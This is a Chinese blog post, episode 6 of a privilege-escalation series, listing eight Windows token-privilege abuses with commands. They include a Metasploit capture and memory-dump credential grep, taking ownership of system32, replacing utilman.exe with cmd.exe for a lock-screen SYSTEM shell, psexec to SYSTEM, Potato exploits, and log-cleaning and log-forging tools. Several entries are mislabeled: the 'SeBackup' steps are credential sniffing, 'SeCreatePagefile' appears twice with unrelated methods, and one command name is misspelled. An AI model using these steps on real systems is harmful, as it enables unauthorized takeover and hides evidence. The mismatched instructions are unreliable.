百种提权及手段一览系列第6集

特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
在这里插入图片描述

主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。

截至目前,我们一共分享了39种提权方法,本期我们继续整理了8种热门提权方式,本期分享完后,我们一共分享了47种方法离100种方法也快完在一半了,继续查收哟,:
1.Abuse via SeBackup
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
In Metasploit (msf > prompt) 输入: use auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) 输入: set uripath x
In Metasploit (msf > prompt) 输入: run
在taskmgr中,右键单击“Image Name”栏中的“iexplore.exe”
并从弹出菜单中选择“创建转储文件”.
strings /root/Desktop/iexplore.DMP | grep “Authorization: Basic”
选择复制 Base64 编码字符串
在命令提示符下键入:echo -ne [Base64 String] | Base64-d
2.Abusing via SeCreatePagefile
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin
批注:https://github.com/MagnetForensics/Hibr2Bin

3.Abusing via SeSystemEnvironment
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
TrustExec.exe -m exec -c “whoami /priv” -f
批注:两个工具都没找到QAQ

4.Abusing via SeTakeOwnership
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
takeown.exe /f “%windir%\system32”
icalcs.exe “%windir%\system32” /grant “%username%”:F
将cmd.exe重命名为utilman.exe
锁定控制台并按Win+U

5.Abusing via SeTcb
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
PSBits
Or
PrivFu
psexec.exe -i -s -d cmd.exe

6.Abusing via SeTrustedCredManAccess
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
Or
CredManBOF
TrustExec.exe -m exec -c “whoami /priv” -f

7.Abusing tokens via SeAssignPrimaryToken
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
JuicyPotato.exe
Or
https://github.com/decoder-it/juicy_2
https://github.com/antonioCoco/RoguePotato

8.Abusing via SeCreatePagefile
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
invoke-module LogCleaner.ps1
批注:wela链接https://github.com/Yamato-Security/WELA
日志伪造工具flog:https://github.com/mingrammer/flog

  • 5
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值